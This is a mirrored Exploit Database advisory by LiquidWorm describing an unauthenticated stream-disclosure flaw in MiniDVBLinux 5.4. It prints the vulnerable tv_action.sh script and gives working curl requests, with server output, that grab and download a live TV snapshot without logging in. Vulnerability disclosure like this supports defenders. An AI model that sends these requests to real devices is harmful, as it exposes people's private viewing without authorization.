MiniDVBLinux 5.4 – Unauthenticated Stream Disclosure

• Exploit Database
• 19 阅读

• 作者： LiquidWorm
  日期： 2023-03-27
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51095/

• # Exploit Title: MiniDVBLinux 5.4- Unauthenticated Stream Disclosure
  # Exploit Author: LiquidWorm
  MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability
  
  
  Vendor: MiniDVBLinux
  Product web page: https://www.minidvblinux.de
  Affected version: <=5.4
  
  Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
  way to convert a standard PC into a Multi Media Centre based on the
  Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
  Linux based Digital Video Recorder: Watch TV, Timer controlled
  recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
  via browser, and a lot more. MLD strives to be as small as possible,
  modular, simple. It supports numerous hardware platforms, like classic
  desktops in 32/64bit and also various low power ARM systems.
  
  Desc: The application suffers from an unauthenticated live stream
  disclosure when /tpl/tv_action.sh is called and generates a snapshot
  in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
  
  --------------------------------------------------------------------
  /var/www/tpl/tv_action.sh:
  --------------------------
  01: #!/bin/sh
  02:
  03: header
  04:
  05: quality=60
  06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
  07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
  --------------------------------------------------------------------
  
  Tested on: MiniDVBLinux 5.4
   BusyBox v1.25.1
   Architecture: armhf, armhf-rpi2
   GNU/Linux 4.19.127.203 (armv7l)
   VideoDiskRecorder 2.4.6
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5716
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php
  
  
  24.09.2022
  
  --
  
  
  1. Generate screengrab:
   - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"
   - Response: 
  220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
  250 Grabbed image /tmp/tv.jpg 60
  221 mld closing connection
  
  2. View screengrab:
   - Request: curl http://ip:8008/images/tv.jpg
  
  3. Or use a browser:
   - http://ip:8008/home?site=remotecontrol